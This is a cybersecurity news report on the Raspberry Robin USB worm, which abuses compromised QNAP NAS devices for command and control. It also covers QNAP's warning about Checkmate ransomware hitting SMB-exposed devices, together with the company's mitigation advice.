Cybersecurity researchers are drawing attention to a continuing wave of attacks linked to a cluster of threats tracked as Raspberry Robin that hides behind Windows malware with worm-like capabilities.
Describing it as a “persistent” and “spreading” threat, Cybereason said it observed a number of casualties in Europe.
The infections involve a worm that spreads to removable USB devices containing a malicious .LNK file and exploits compromised QNAP network-attached storage (NAS) devices for command and control. It was first documented by Red Canary researchers in May 2022.
Also named QNAP worm by Sekoia, the malware exploits a legitimate Windows installer binary called “msiexec.exe” to download and execute a malicious shared library (DLL) from a compromised QNAP NAS device.
“To make detection more difficult, Raspberry Robin leverages process injections into three legitimate Windows system processes,” Cybereason researcher Loïc Castel said in a technical post, adding that it “communicates with the rest of [the] the infrastructure via the TOR exit nodes. »
Persistence on the compromised machine is achieved by making changes to the Windows Registry to load the malicious payload through the Windows binary “rundll32.exe” during the boot phase.
The campaign, which is believed to date back to September 2021, has remained a mystery so far, with no clues as to the menacing actor’s origin or his end goals.
The disclosure comes as QNAP said it is actively investigating a new wave of Checkmate ransomware infections targeting its devices, making it the latest in a string of attacks after AgeLocker, eCh0raix and DeadBolt.
“Preliminary investigation indicates that Checkmate attacks via SMB services exposed to the Internet and uses a dictionary attack to crack accounts with weak passwords,” the company noted in a notice.
“Once the attacker successfully connects to a device, he encrypts data in shared folders and leaves a ransom note with filename ‘!CHECKMATE_DECRYPTION_README’ in each folder.”
As a precaution, the Taiwanese company recommends customers not to expose SMB services to the Internet, improve password strength, perform regular backups, and update QNAP OS to the latest version. .